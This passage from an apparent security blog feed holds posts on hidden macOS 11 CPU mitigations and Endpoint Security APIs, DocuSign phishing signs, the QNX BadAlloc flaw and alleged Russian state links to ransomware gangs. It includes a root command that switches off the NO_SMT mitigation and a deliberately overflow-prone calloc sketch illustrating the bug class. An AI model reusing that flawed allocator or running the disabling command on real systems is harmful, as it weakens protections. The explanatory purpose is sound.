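#include <string.h>
#include <stdlib.h>

extern char **environ;

int main(void)
{
    posix_spawnattr_t attr;
    pid_t pid;
    char *argv[] = { "true", NULL };

    posix_spawnattr_init(&attr);
    posix_spawnattr_setnosmt_np(&attr);                   /* request NO_SMT for the new image */
    posix_spawnattr_setflags(&attr, POSIX_SPAWN_SETEXEC); /* behave like exec(2), not spawn */

    /* On success this call never returns: the current process image is replaced */
    int rc = posix_spawn(&pid, "/usr/bin/true", NULL, &attr, argv, environ);

    fprintf(stderr, "posix_spawn: %s\n", strerror(rc));
    posix_spawnattr_destroy(&attr);
    return EXIT_FAILURE;
}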

How does it work?

NO_SMT is implemented as a per-task (not per-process[1]) flag, named TF_NO_SMT, or a per-thread scheduling flag named TH_SFLAG_NO_SMT. The flag is copied from tasks to their children, tasks and threads alike; it’s a write-once flag, that once set cannot be removed. The flag is then copied from each thread to the CPU they’re currently running on (field processor_t::current_is_NO_SMT).

NO_SMT is implemented by the dualq scheduling algorithm, in a pretty straightforward way: A NO_SMT thread cannot share a CPU core with any other thread.

NO_SMT can be disabled system-wide with boot argument disable_NO_SMT_threads, which causes the kernel variable sched_allow_NO_SMT_threads to be initialized with 0 instead of 1. The current value of sched_allow_NO_SMT_threads can be queried with sysctl kern.sched_allow_NO_SMT_threads:

tstudent@MAC-67C2FA8CA4EC ~ % sysctl kern.sched_allow_NO_SMT_threads
kern.sched_allow_NO_SMT_threads: 1

The equivalent of NO_SMT can be forced on system-wide at the firmware level, by setting NVRAM variable SMTDisable to %01, as described in Apple support article HT210108.

Why you probably shouldn’t use NO_SMT

Enabling NO_SMT through the API, instead of configuring the firmware to boot the machine with SMT support disabled, provides limited protection, as the sched_allow_NO_SMT_threads variable is writable at runtime by the superuser:

tstudent@MAC-67C2FA8CA4EC ~ % sudo sysctl kern.sched_allow_NO_SMT_threads=0
Password:
kern.sched_allow_NO_SMT_threads: 1 -> 0

This instantly disables NO_SMT system-wide. I wonder why they bothered making it a write-once flag, only to make it so trivial to disable.

The TECS mitigation

What is it?

I have been unable to figure out what TECS stands for. Closest I could get was this comment from the source code of the kernel (osfmk/kern/task.h, from XNU 7195.50.7.100.1):

#define TF_TECS                 0x00020000                              /* task threads must enable CPU security */

Thread Enable CPU Security? Even if it’s the correct interpretation, it doesn’t help us understand what it does.

In its current incarnation (the generic name suggests the specifics might change in the future), TECS flushes certain internal CPU buffers before returning from kernel mode to user mode. It’s a mitigation for the Rogue Data Cache Load (RDCL) family of attacks (like Meltdown) and the Microarchitectural Data Sampling (MDS) family of attacks (like RIDL and Fallout).

How to use TECS

Unlike NO_SMT, TECS doesn’t have a dedicated API, but it’s enabled through a generic API called CPU Security Mitigations (CSM), that can also enable NO_SMT. In C/C++, #include <libproc.h>; no extra library necessary. From <libproc.h>:

/*
 * CPU Security Mitigation APIs
 *
 * Set CPU security mitigation on the current proc (all existing and future threads)
 * This attribute is inherited on fork and exec
 */
int proc_set_csm(uint32_t flags) __API_AVAILABLE(macos(11.0));

/* Set CPU security mitigation on the current thread */
int proc_setthread_csm(uint32_t flags) __API_AVAILABLE(macos(11.0));

/*
 * flags for CPU Security Mitigation APIs
 * PROC_CSM_ALL should be used in most cases,
 * the individual flags are provided only for performance evaluation etc
 */
#define PROC_CSM_ALL         0x0001  /* Set all available mitigations */
#define PROC_CSM_NOSMT       0x0002  /* Set NO_SMT - see above */
#define PROC_CSM_TECS        0x0004  /* Execute VERW on every return to user mode */

As with the dedicated NO_SMT API, we can enable mitigations for the entire current process, using proc_set_csm, or just the calling thread, with proc_setthread_csm. CSM functions, too, are wrappers for process_policy(2).

Finally, just like NO_SMT, CSM also extends posix_spawn(2). From <spawn.h>:

/*
 * Set CPU Security Mitigation on the spawned process
 * This attribute affects all threads and is inherited on fork and exec
 */
int     posix_spawnattr_set_csm_np(const posix_spawnattr_t * __restrict attr, uint32_t flags) __API_AVAILABLE(macos(11.0));
/*
 * flags for CPU Security Mitigation attribute
 * POSIX_SPAWN_NP_CSM_ALL should be used in most cases,
 * the individual flags are provided only for performance evaluation etc
 */
#define POSIX_SPAWN_NP_CSM_ALL         0x0001
#define POSIX_SPAWN_NP_CSM_NOSMT       0x0002
#define POSIX_SPAWN_NP_CSM_TECS        0x0004

The meaning of the flags is identical to the similarly named <libproc.h> flags, and posix_spawnattr_set_csm_np(attr, POSIX_SPAWN_NP_CSM_NOSMT) is 100% identical to and interchangeable with posix_spawnattr_setnosmt_np(attr).
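
In practice, then, enabling everything for the current process is a one-liner. A minimal sketch:

#include <libproc.h>
#include <stdio.h>

int main(void)
{
    /* Ask for all currently available CPU security mitigations (NO_SMT and TECS today) */
    int rc = proc_set_csm(PROC_CSM_ALL);
    if (rc != 0)
        fprintf(stderr, "proc_set_csm failed (%d)\n", rc);

    /* ... process untrusted input, handle secrets, etc. ... */
    return 0;
}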

How does it work?

Just like NO_SMT, TECS is a write-once, enable-only flag that is copied from task to task, from task to thread, and from thread to CPU. The task flag is TF_TECS. Below the task level, the flag becomes architecture-specific, x86-64-only, morphing into a mitigation codenamed SEGCHK. Thus, the thread flag is boolean field machine_thread::mthr_do_segchk, and the CPU flag is boolean field cpu_data::cpu_curthread_do_segchk, also known as CPU_NEED_SEGCHK in assembler code.

SEGCHK is implemented entirely in assembler, in kernel-to-user return routines ks_64bit_return and ks_32bit_return. If CPU_NEED_SEGCHK is set for the current CPU, they execute a VERW instruction shortly before the final SYSEXIT/SYSRET/IRET. VERW is an obscure and largely obsolete instruction that checks if the specified segment (the user mode stack segment, in the case of SEGCHK) is writable; but more importantly, it has the side effect of flushing the caches exploited by the RDCL and MDS families of attacks, mitigating them.

TECS is only enabled if it’s supported by the CPU, or if it’s been forced on by default. CPU support for TECS is only checked on x86-64, and it corresponds to whether SEGCHK is supported. The checks are performed at boot time.

Using VERW as a mitigation was initially suggested by two of the discoverers of RIDL (page 200), but it seems it proved insufficient, and CPU vendors had to enhance the instruction to act as a proper mitigation. macOS doesn’t trust the un-enhanced VERW.

SEGCHK can be forced on system-wide with a boot parameter. Again, see support article HT210108. Similarly, it can be forced off system-wide with undocumented boot parameter cwad (CPU workaround disable), which has the same syntax as cwae (CPU workaround enable). cwae has priority over cwad.

Unlike NO_SMT, SEGCHK/TECS has no firmware-level equivalent, nor can it be disabled after boot.

Who benefits from NO_SMT and TECS?

Google.

I’ve looked everywhere and no one else seems to use these mitigation APIs. The only source code match (outside of the macOS 11 and 12 SDKs, and the XNU source code itself) is Chromium. The only binary matches on my macOS 11 machine (outside of system libraries) are the Chrome and Electron frameworks, i.e. Chromium. Not even Safari seems to use them!

In Chromium, when compiling for macOS, the base::LaunchOptions structure passed to function base::LaunchProcess contains a boolean field named enable_cpu_security_mitigations; if set, the macOS implementation of base::LaunchProcess launches the new process with CSM flags POSIX_SPAWN_NP_CSM_ALL. If I understand the code correctly, mitigations are enabled for renderer and plugin host sub-processes, and disabled for all other kinds of sub-processes (another possible reading of the code suggests that the feature is implemented, but unused. Honestly, I haven’t dug too deep).

It’s hard not to wonder why Apple went through the effort of implementing mitigations and exposing them as APIs, and then neither document nor even use them. If they are ineffective, the question becomes why Google bothers using them. Either way, we are left with no clear answer.

Endpoint Security API improvements

Endpoint Security probably needs no introduction to the audience of this article, but I’ll still give a brief one.

This C API, first introduced in macOS 10.15, replaced and made obsolete the pre-existing patchwork of archaic auditing, monitoring and policing APIs (among which OpenBSM, KAUTH, Socketfilter and the venerable acct(2)—est. 1979[2]).

The design of Endpoint Security combined the near-absolute visibility and veto power over system state of a MAC[3] policy module with the safety properties of a client-server model, with a really nice and pretty-well-documented API on top. In short, it was the perfect API for a large variety of security applications.

Or was it? Unfortunately, Endpoint Security wasn’t without its own shortcomings, but they’re gradually being rectified. Let’s have a look at the most important improvements that macOS 11 and 12 make to Endpoint Security, only some of which were officially documented.

More message types

More operations can now be detected and/or vetoed, such as fcntl(2), searchfs(2), ptrace(2), remounting a filesystem, IOServiceOpen, task_name_for_pid, process suspension and process resumption.

Interestingly, process suspension includes private system call pid_shutdown_sockets, which doesn’t actually suspend processes, but only shuts down their network connections after they’ve already been suspended. The system call was originally only available on iOS, where it’s part of how apps are sent to the background.

macOS 12 adds some more notifications: setuid(2), setgid(2), seteuid(2), setegid(2), setreuid(2) and setregid(2).

More notifications, less polling

Some process metadata that only used to be available for querying, and necessitated polling and/or diffing to detect changes, now generates change events.

ES_EVENT_TYPE_NOTIFY_CS_INVALIDATED messages notify that a process’s code signature has gone invalid (i.e. CS_VALID flag no longer set) but the process is allowed to keep running (i.e. CS_HARD flag not set). Previously, it was only pollable through private system calls csops or csops_audittoken with operation code CS_OPS_STATUS.

ES_EVENT_TYPE_NOTIFY_REMOTE_THREAD_CREATE messages notify the creation of remote (i.e. inter-process) threads. Previously, this information was only available at low fidelity and with great effort, either by polling and diffing the data returned by Mach task method task_info with flavor TASK_EXTMOD_INFO, or by monitoring syslog for com.apple.kernel.external_modification messages.
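
As a rough sketch of how a client would consume the new notifications (an Endpoint Security client must run as root and hold the com.apple.developer.endpoint-security.client entitlement; this is illustrative, not production code):

#include <EndpointSecurity/EndpointSecurity.h>
#include <bsm/libbsm.h>
#include <dispatch/dispatch.h>
#include <stdio.h>

int main(void)
{
    es_client_t *client = NULL;

    /* The handler block runs on an Endpoint Security-owned thread for every delivered message */
    es_new_client_result_t res = es_new_client(&client,
        ^(es_client_t *c, const es_message_t *msg) {
            pid_t pid = audit_token_to_pid(msg->process->audit_token);
            if (msg->event_type == ES_EVENT_TYPE_NOTIFY_CS_INVALIDATED)
                printf("code signature invalidated: pid %d\n", pid);
            else if (msg->event_type == ES_EVENT_TYPE_NOTIFY_REMOTE_THREAD_CREATE)
                printf("remote thread created by pid %d\n", pid);
        });
    if (res != ES_NEW_CLIENT_RESULT_SUCCESS) {
        fprintf(stderr, "es_new_client failed: %d\n", (int)res);
        return 1;
    }

    es_event_type_t events[] = {
        ES_EVENT_TYPE_NOTIFY_CS_INVALIDATED,
        ES_EVENT_TYPE_NOTIFY_REMOTE_THREAD_CREATE,
    };
    es_subscribe(client, events, sizeof(events) / sizeof(events[0]));

    dispatch_main();   /* never returns; messages keep arriving in the block above */
}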

More metadata

exec(2) messages now include the new process’s working directory (es_event_exec_t::cwd field).

Process metadata for all messages now includes:

  • The process’s controlling terminal, if any (es_process_t::tty field).
  • The process’s “start time”, i.e. the time when its process identifier was allocated by fork(2) (es_process_t::start_time field). Previously only available through sysctl(2) with the kern.proc.pid.<process identifier> OID.
  • The “responsible process” (es_process_t::responsible_audit_token field), i.e. the process that the notorious (to us developers) Transparency, Consent & Control (TCC) framework blames for an operation subject to user consent. Often, this is the client process that caused a daemon/agent process to be launched, which in an auditing context should be considered the “true” parent of a process (instead of “placeholder” xpcproxy(8)). Previously only available through the private—and completely undocumented—“responsibility” API of MAC policy module Quarantine (e.g. responsibility_get_responsible_for_pid).

Finally, for the first time ever in a macOS auditing API, all messages now report not just the process that caused the message to be generated, but the exact thread as well (es_message_t::thread field).

Improved performance

It’s now possible to process messages asynchronously without the overhead of es_copy_message/es_free_message (equivalent to a sequence of malloc, memcpy and free): Messages are now reference counted (see new functions es_retain_message/es_release_message), and can be moved across threads almost for free. es_copy_message and es_free_message have been outright deprecated and should no longer be used, except for backwards compatibility with macOS 10.15. They won’t be missed by me or my spindump traces.
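
A sketch of the new pattern, as it might appear inside a handler block (the worker queue is hypothetical):

#include <EndpointSecurity/EndpointSecurity.h>
#include <dispatch/dispatch.h>

/* Called from inside an es_new_client handler block (see the earlier sketch):
 * hands the message to a worker queue without paying for es_copy_message. */
static void defer_message(const es_message_t *msg, dispatch_queue_t worker)
{
    es_retain_message(msg);            /* macOS 11+: take a reference instead of copying */
    dispatch_async(worker, ^{
        /* ... expensive processing of msg, off the Endpoint Security delivery thread ... */
        es_release_message(msg);       /* balance the retain once we're done */
    });
}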

A vulnerability quietly fixed

Sometimes, diffing SDK versions can even reveal security holes that were quietly fixed. Such is the case for fcntl(2) command F_SETSIZE.

F_SETSIZE is used to change the maximum disk space allocated to a file: If it’s smaller than the current size, the file is truncated; if it’s larger, the file is extended. What stops a malicious process from extending a file so that it fills the entire disk, and then reading from the extended file to carve deleted files out of what was previously free space? Very simple: F_SETSIZE fills the new file space with all zeroes to conceal what it used to contain. As an optimization, a superuser process (effective user id 0) is allowed to extend a file without zeroing out, because a superuser process is assumed to have access to that data anyway.

However, macOS has gradually made the UNIX security model irrelevant. For example, even the superuser is only allowed to access the private documents of a regular user with the user’s permission—permission that is given on a per-application basis, through that protector of users and bane of developers known as the Transparency, Consent & Control (TCC) framework. This reflects the new meaning that macOS has given to the “root” superuser: No longer the administrator of a multi-user system, as it was originally meant on UNIX, but either a temporary identity assumed by each user for system administration tasks (e.g. by way of sudo(8)), or the anonymous user under which daemons run[4].

In this new security model, the superuser can no longer be assumed to have unrestricted access to everything. However, not zeroing space when extending a file would let a superuser process with no entitlements at all recover any file that had been deleted.

macOS 11 fixes this by no longer handling the superuser as a special case for F_SETSIZE. The man page for fcntl(2) now says:

F_SETSIZE: Deprecated. In previous releases, this would allow a process with root privileges to truncate a file without zeroing space. For security reasons, this operation is no longer supported and will instead truncate the file in the same manner as truncate(2).

Even the comments in <sys/fcntl.h> were amended. Before (macOS 10.15 SDK):

#define F_SETSIZE       43              /* Truncate a file without zeroing space */

And after (macOS 11 SDK):

#define F_SETSIZE       43              /* Truncate a file. Equivalent to calling truncate(2) */

As far as I can tell, this information disclosure vulnerability was never assigned a CVE, nor was it publicly acknowledged in any other way before it was silently fixed in macOS 11.

O_NOFOLLOW_ANY

Even primeval APIs like system call open(2) can still have room for improvement. macOS 11 introduces a new flag for it, O_NOFOLLOW_ANY, that mitigates an entire family of potential vulnerabilities, especially in security applications.

Endpoint Security provides the full, resolved (no symlinks), normalized path of each file involved in an auditable event (what OpenBSM veterans/victims like me used to know as “vnode kpath”), but how can applications be sure that the path still identifies the same file by the time they open it? With O_NOFOLLOW_ANY set, open(2) will fail with error ELOOP if any symlink is encountered anywhere in the path: A stronger version of O_NOFOLLOW that applies to the entire path, not just the final component.
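
A short sketch of the intended use, given a fully resolved path such as the one Endpoint Security reports (the path here is just a placeholder):

#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <unistd.h>

/* Open a path we expect to contain no symlinks anywhere (macOS 11+ only) */
static int open_resolved_path(const char *path)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW_ANY);
    if (fd < 0 && errno == ELOOP)
        fprintf(stderr, "%s: a symlink appeared somewhere in the path; refusing to follow it\n", path);
    return fd;
}

int main(void)
{
    int fd = open_resolved_path("/usr/bin/true");   /* placeholder path */
    if (fd >= 0)
        close(fd);
    return 0;
}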

Conclusion

What did I learn from my rummaging? Apple still likes its secrets; the Chromium source code still is the best documentation on the mitigations and sandboxing features provided by all major operating systems; diffing releases remains the best way to find hidden features; and some secrets can stay hidden in plain sight for a long time.

I wrote this article in part as a “look at this cool thing”, and in part as a sort of public service, so that the new, hidden macOS features no longer return a deafening silence when queried on search engines. Even if I got some details wrong, at least the topic can now be debated.

Endnotes

1 The relationship between tasks and processes in macOS can be roughly summarized as: Each (BSD) process corresponds exactly to one (Mach[5]) task, and vice versa, until the process calls exec(2). exec(2) terminates the current task, creates a new one and associates it to the process, replacing the dead one. macOS old-timers may object that exec(2) actually keeps the same task, resetting its state. It used to work like that, but it was a fragile design that was dealt a fatal blow by Google researcher Ian Beer in 2016. Starting from XNU 3789.21.4 (macOS 10.12.1, iOS 10.1), exec(2) creates a new task.

2 What’s the use for such an ancient API? It may sound incredible, but until Endpoint Security, macOS had no reliable auditing mechanism to log process deaths. Except acct(2), that is, which to describe as “archaic” would be a compliment. It logs fixed-size records to a global log file, it truncates process names to 9 characters, it logs user ids but not process ids, and the timestamp format for process exit times is a literally unbelievable $\frac{1}{64}\,8^{\mathit{exponent}}\,\mathit{mantissa}$ seconds since the process started (good for about 8 years and a half of non-stop running, but with a variable precision that drops below the second at the 2:16:30 mark), encoded in 16 bits as 3 bits $\mathit{exponent}$, 13 bits $\mathit{mantissa}$; the process start time is a saner 32-bit count of seconds since the UNIX epoch (good for about 17 years from now). We opted not to use acct(2).
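
For the morbidly curious, decoding that 16-bit format looks roughly like this (a sketch based solely on the layout just described; the function name is mine):

#include <stdint.h>

/* Sketch only: a 16-bit value with a 3-bit base-8 exponent in the top bits
 * and a 13-bit mantissa below, counted in 1/64-second ticks. */
double acct_time_to_seconds(uint16_t t) {
    unsigned exponent = (t >> 13) & 0x7;   /* top 3 bits */
    unsigned mantissa = t & 0x1fff;        /* bottom 13 bits */
    double ticks = (double)mantissa;
    while (exponent-- > 0) {
        ticks *= 8.0;                      /* apply 8^exponent */
    }
    return ticks / 64.0;                   /* 64 ticks per second */
}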

3 Mandatory Access Control, no relation to “Mac” as an abbreviation for “Macintosh”. Historically referring to security models patterned after military document classification practices, MAC is nowadays a generic term for any policy-based security model, distinct from and orthogonal to permission-based security models (also known as DAC, or Discretionary Access Control). macOS inherited its modular MAC framework from the TrustedBSD project and uses it with great gusto (I count no fewer than seven policy modules on my macOS 11 machine). The Linux Security Modules framework is the Linux equivalent. Windows has limited MAC in the form of the capabilities system for UWP apps. The bitter irony is that, being limited to a small subset of applications, it’s a “mandatory” access control system that operates on an opt-in basis—to say nothing of its complete non-extensibility.

4 If daemons have to run under an anonymous user, why must it be root, which, while still bound by MAC policies, can bypass all ACLs, send kill signals to any process, invoke sysctls in write mode and in general do a lot of damage? A little known fact is that while system daemons run as root, they also do run inside extremely strict sandboxes based on the Seatbelt framework (internally based on, you guessed it, a MAC policy module, unimaginatively named Sandbox). In a sadly predictable twist, while extremely powerful and enabling incredibly granular access control, Seatbelt is almost completely undocumented (notice a pattern yet?). In a less predictable but sadder twist, it’s also been marked as deprecated with no replacement since OS X 10.8. Nevertheless, with all system daemons using it, plus third-party users of the caliber of Google Chrome and Mozilla Firefox, Seatbelt seems unlikely to disappear any time soon.

5 Mach (no relation to “Macintosh”) was a research project to replace the BSD kernel with a microkernel. The design proved impractical, and the most famous real-world implementation of Mach, NeXTSTEP (later “Darwin”, later “OS X”, later “macOS”), actually runs a Mach/BSD hybrid kernel with very little “micro”. Mach was an extremely influential design: Windows NT (later “Windows”) is a Mach clone too, except redesigned to work alongside a VMS-like kernel instead of a BSD one. Windows NT, too, flirted with a microkernel architecture, but it proved to be no more practical in the 90s than it had been in the 80s.

The post macOS 11’s hidden security improvements appeared first on Malwarebytes Labs.

How to spot a DocuSign phish and what to do about it

Phishing scammers love well-known brand names, because people trust them, and their email designs are easy to rip off. And the brands phishers like most are the ones you’re expecting to hear from, or wouldn’t be surprised to hear from, like Amazon or DHL. Now you can add DocuSign to that list.

DocuSign is a service that allows people to sign documents in the Cloud. Signing documents electronically saves a lot of paper and time. It also cuts back on human contact, which is particularly useful for remote working, or when everyone is locked down in a pandemic. Google searches for DocuSign almost doubled during March 2020, and stayed there, as so many people around the world started working from home.

Earlier this year, DocuSign specifically warned about phishing campaigns using its brand.

Bad signs to look for

DocuSign phishing emails have many of the tell-tale signs of other phishing attacks: Fake links, fake senders, misspellings, and the like. Recipients can check links by hovering their mouse pointer over the document link in the email. If it is an actual DocuSign document, it will be hosted at docusign.net. In the spam campaigns we have seen, documents were hosted at docs.google.com or feedproxy.google.com, and some arrived as attachments, which DocuSign does not do.

Also, the sender address should belong to docusign.net, but that alone is not enough: We have seen spoofed messages coming from that address, so check for other indicators. You can read an exhaustive list of things to look out for, as well as addresses to report suspicious activity on DocuSign’s incident reporting page (although we recommend you simply opt for the safe document access option, described below).

Remember, if you’re in doubt, it is not stupid or rude to contact the sender directly by another method and verify the email’s authenticity (just don’t hit “reply”).

We’ve included some examples of DocuSign phishing campaigns below.

Fake DocuSign invoice emails

DocuSign Sample
An example of a phishing email using the DocuSign brand

Signs:

  • “Dear Receiver”? If the sender does not use your actual name, that is a red flag.
  • The security code is way too short.
  • DocuSign links will read “REVIEW DOCUMENT” if it is a document that needs to be signed.
  • An extra space in “inquiries , contact” and other sloppy writing.
  • Document was hosted at feedproxy.google.com, not docusign.net.

DocuSign Sample2
An example of a phishing email using the DocuSign brand

Signs:

  • “Dear Recipient”? Again, if the sender does not use your actual name, that is a red flag.
  • The security code is way too short.
  • Sentences are slightly off, like you would expect from a non-native speaker.
  • Document was hosted at docs.google.com.

Fake DocuSign attachments

Another sample from our spam honeypot came with an attachment pretending to be from DocuSign.

DocuSign Sample3
An example of a phishing email with an attachment, claiming to be an invoice from DocuSign

The sender address was spoofed. Opening the attachment presents the user with a fake Microsoft login screen, hoping to harvest the target’s password. The information would have been sent to a command and control server through the use of a compromised WordPress website.

login screen
A fake Microsoft login screen triggered by a fake DocuSign invoice

Safe document access

Rather than trying to identify whether or not an email is bad, it’s often safer (and no less convenient) to assume it’s bad and ignore its links completely.

We recommend that you use the “Alternate Signing Method” mentioned in legitimate DocuSign mails. If you get a DocuSign email, visit docusign.com, click ‘Access Documents’, and enter the security code provided in the email. It will have a format similar to this one: EA66FBAC95CF4117A479D27AFB9A85F01. (Don’t bother, it’s invalid.) If a scammer sends you a fake code it simply won’t work. There is no need to trust the sender, or the links in their email.

However, to complicate matters, phishers have now been discovered sending legitimate DocuSign emails from legitimate DocuSign accounts.

Real DocuSign emails used for phishing

Security vendor Avanan recently spotted a new DocuSign campaign that bypasses most of the advice provided above, by using real DocuSign accounts.

In this new attack, scammers upload a file to a real DocuSign account (either a free one or one stolen from somebody else) and share it with the target’s email address.

As a result, the recipient will receive a legitimate DocuSign mail with an existing and functional security code that leads to the malicious file. Sharing malicious documents is hard to do, because DocuSign does have protection against weaponized attachments: Uploaded document files are converted into static .pdf files, which removes malicious content like embedded macros. It remains to be seen if attackers will find ways around DocuSign’s protections. It probably won’t be necessary though.

Hyperlinks are carried across to the shared document, after it’s converted to a PDF, and remain clickable for the recipient. So all an attacker has to do is make the victim click a link to a phishing site in the DocuSign-hosted document. And scammers are very good at getting people to click on links.

The protection methods against attacks using existing DocuSign accounts are:

  • You can determine if the email is legitimate by contacting the alleged sender using something other than email.
  • If you fall for the scam, anti-malware software will warn you if you try to go to a known phishing site; it should recognize and block malicious files that get downloaded; and its exploit protection will stop malicious documents from deploying their payload.
  • If the phishing site is unknown, a password manager can help. A password manager will not provide credentials for a site that it does not recognize, and while a phishing site might fool the human eye, it won’t fool a password manager. This helps stop users from having their passwords harvested.

Keep your passwords safe!

The post How to spot a DocuSign phish and what to do about it appeared first on Malwarebytes Labs.

Cars and hospital equipment running Blackberry QNX may be affected by BadAlloc vulnerability

Following an announcement by BlackBerry, the U.S. Food & Drug Administration (FDA) and the Cybersecurity & Infrastructure Security Agency (CISA) have put out alerts that vulnerabilities found in the BlackBerry QNX real-time operating system (RTOS) may introduce risks for certain medical devices.

Manufacturers are assessing which devices may be affected by the BlackBerry QNX cybersecurity vulnerabilities and are evaluating the risk and developing mitigations, including deploying patches from BlackBerry.

FDA and CISA warnings

The FDA, in its warning that certain medical devices may be affected by BlackBerry QNX cybersecurity vulnerabilities, points to the CISA alert. CISA mentions CVE-2021-22156, an integer overflow vulnerability in the calloc() function of the C runtime library in affected versions of the BlackBerry® QNX Software Development Platform (SDP) 6.5.0SP1 and earlier, QNX OS for Medical 1.1 and earlier, and QNX OS for Safety 1.0.1 and earlier, which could allow an attacker to perform a denial of service or execute arbitrary code.

BlackBerry’s QNX is an RTOS: an operating system (OS) designed to serve real-time applications that process data as it comes in. Typically this type of software is deployed in devices that require immediate interaction based on incoming information. The best example in this case may be the driver assistance options that many car manufacturers provide nowadays.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). CISA notes that CVE-2021-22156 is part of a collection of integer overflow vulnerabilities known as BadAlloc.

What is BadAlloc?

In April of 2021, the Azure Defender for IoT security research group uncovered a series of critical memory allocation vulnerabilities in IoT and OT devices that adversaries could exploit to bypass security controls in order to execute malicious code or cause a system crash.

These Remote Code Execution (RCE) vulnerabilities were dubbed BadAlloc and they were found to affect a wide range of domains, from consumer and medical IoT to Industrial IoT, Operational Technology (OT), and industrial control systems. Given the pervasiveness of IoT and OT devices, these vulnerabilities, if successfully exploited, represent a significant potential risk for organizations of all kinds.
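
To illustrate the bug class (and only to illustrate it; this sketch is not BlackBerry’s code, and the function name is made up), the classic pattern looks like this:

#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Illustrative sketch of the BadAlloc class of bugs, not BlackBerry's actual
 * calloc(): if nmemb * size wraps around, the allocator returns a buffer far
 * smaller than the caller asked for, and later writes overflow the heap. */
void *naive_calloc(size_t nmemb, size_t size) {
    size_t total = nmemb * size;              /* can overflow silently */
    /* A hardened implementation rejects the overflow up front, e.g.:
     *   if (size != 0 && nmemb > SIZE_MAX / size) return NULL;       */
    void *p = malloc(total);
    if (p != NULL) {
        memset(p, 0, total);
    }
    return p;
}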

We blogged about BadAlloc back in April if you are interested in more details.

Blackberry

If you are in my age group, you may remember BlackBerry as a producer of smartphones that went the same way as VHS tapes and vinyl records: appreciated by a few, but hardly a serious competitor for the big guns.

Nowadays BlackBerry produces software that is widely used—for example, in two hundred million cars, along with critical hospital and factory equipment. Automakers use BlackBerry® QNX® software in their advanced driver assistance, digital instrument clusters, connectivity modules, hands-free, and infotainment systems that appear in multiple car brands, including Audi, BMW, Ford, GM, Honda, Hyundai, Jaguar, Land Rover, KIA, Maserati, Mercedes-Benz, Porsche, Toyota, and Volkswagen.

Keep it under the hood

Back when BadAlloc was made public, BlackBerry kept quiet. But now BlackBerry has announced that old but still widely used versions of one of its flagship products, an operating system called QNX, contain a vulnerability that could let hackers cripple devices that use it.

Insiders have accused BlackBerry of purposely keeping this information to itself at first. The company initially even denied that BadAlloc impacted its products at all, and later resisted making a public announcement, even though it couldn’t identify and inform all of the customers using the software.

Mitigation

CISA strongly encourages critical infrastructure organizations and other organizations developing, maintaining, supporting, or using affected QNX-based systems to patch affected products as quickly as possible.

  • Manufacturers of products that incorporate vulnerable versions should contact BlackBerry to obtain the patch.
  • Manufacturers of products who develop unique versions of RTOS software should contact BlackBerry to obtain the patch code. Note: in some cases, manufacturers may need to develop and test their own software patches.
  • End users of safety-critical systems should contact the manufacturer of their product to obtain a patch. If a patch is available, users should apply the patch as soon as possible. If a patch is not available, users should apply the manufacturer’s recommended mitigation measures until the patch can be applied. Note: installing software updates for an RTOS may frequently require taking the device out of service, or moving it to an off-site location, for physical replacement of integrated memory.

A full list of affected QNX products and versions is available on the QNX website.

Unlike computers, Internet-connected devices can be difficult, or even impossible, to update. When these devices require internet access for their operation, this poses a big security risk. All you can do is reduce the attack surface: minimize or eliminate the exposure of vulnerable devices to the internet, implement network security monitoring to detect behavioral indicators of compromise, and strengthen network segmentation to protect critical assets.

Stay safe, everyone!

The post Cars and hospital equipment running Blackberry QNX may be affected by BadAlloc vulnerability appeared first on Malwarebytes Labs.

Analysts “strongly believe” the Russian state colludes with ransomware gangs

“We have the smoke, the smell of gunpowder and a bullet casing. But we do not have the gun to link the activity to the Kremlin.” This is what Jon DiMaggio, Chief Security Strategist for Analyst1, said in an interview with CBS News following the release of its latest whitepaper, entitled “Nation State Ransomware”. The whitepaper is Analyst1’s attempt to identify the depth of human relationships between the Russian government and the ransomware threat groups based in Russia.

“We wanted to have that, but we believe after conducting extensive research we came as close as possible to proving it based on the information/evidence available today,” DiMaggio concluded.

Here are some of the key players and connections identified by Analyst1:

Evgeniy “Slavik” Bogachev

Hailed as “the most prolific bank robber in the world”, Bogachev is best known for creating ZeuS, one of the most prolific banking information stealers ever seen. According to the report, Bogachev created a “secret ZeuS variant and supporting network” on his own, without the knowledge of his closest underground associates—The Business Club. This ZeuS variant, which is a modified GameOver ZeuS (GOZ), was designed specifically for espionage, and it was aimed at governments and intelligence agencies connected with Ukraine, Turkey, and Georgia.

Analyst1, too, believes that, at some point, Bogachev was approached by the Russian government to work for them in exchange for their blessing to have him continue his fraud operations.

The United States officially indicted Bogachev in May 2014. Seven years on, Russia still refuses to extradite Bogachev. The Ukraine Interior Ministry had provided the reason why: Bogachev was “working under the supervision of a special unit of the FSB.” That is, the Federal Security Service, Russia’s security agency and successor to the Soviet Union’s KGB.

EvilCorp

The Business Club, the underground criminal gang that Bogachev himself put together, continued their operations. In fact, under the new leadership of Maksim “Aqua” Yakubets, Bogachev’s successor, the criminal enterprise rebranded and started calling themselves EvilCorp. Some cybersecurity companies track them under the name Indrik Spider. Since then, they have been behind campaigns harvesting banking credentials in over 40 countries using sophisticated Trojan malware known as Dridex.

Yakubets was hired by the FSB in 2017 to directly support the Russian government’s “malicious cyber efforts”. He was also the likely candidate for this job due to his relationship with Eduard Bendesky, a former FSB colonel who is also his father-in-law. It was also in 2017 that EvilCorp started creating and using ransomware—BitPaymer, WastedLocker, and Hades—for their financially motivated campaigns. In addition, Dridex had been used to drop ransomware onto victim machines.

SilverFish

SilverFish was one of the threat actors quick enough to take advantage of the SolarWinds breach that was made public in mid-December 2020. As you may recall, multiple companies that use SolarWinds’ Orion software were reportedly compromised via a supply-chain attack.

SilverFish is a known Russian espionage actor and is said to be related to EvilCorp, in that the two groups shared similar tools and techniques against one victim: the same command and control (C&C) infrastructure and a unique CobaltStrike Beacon. SilverFish even attacked the same organization a few months after EvilCorp had hit it with ransomware.

Wizard Spider

Wizard Spider is the gang behind the Conti and Ryuk ransomware strains. Analyst1 has previously profiled Wizard Spider as one of the groups operating as part of a ransomware cartel. DiMaggio and his team believe that Wizard Spider is responsible for managing and controlling TrickBot.

EvilCorp has a history of using TrickBot to deliver its BitPaymer ransomware to victim systems. This suggests that a certain level of relationship is at play between the two groups.

Does it matter?

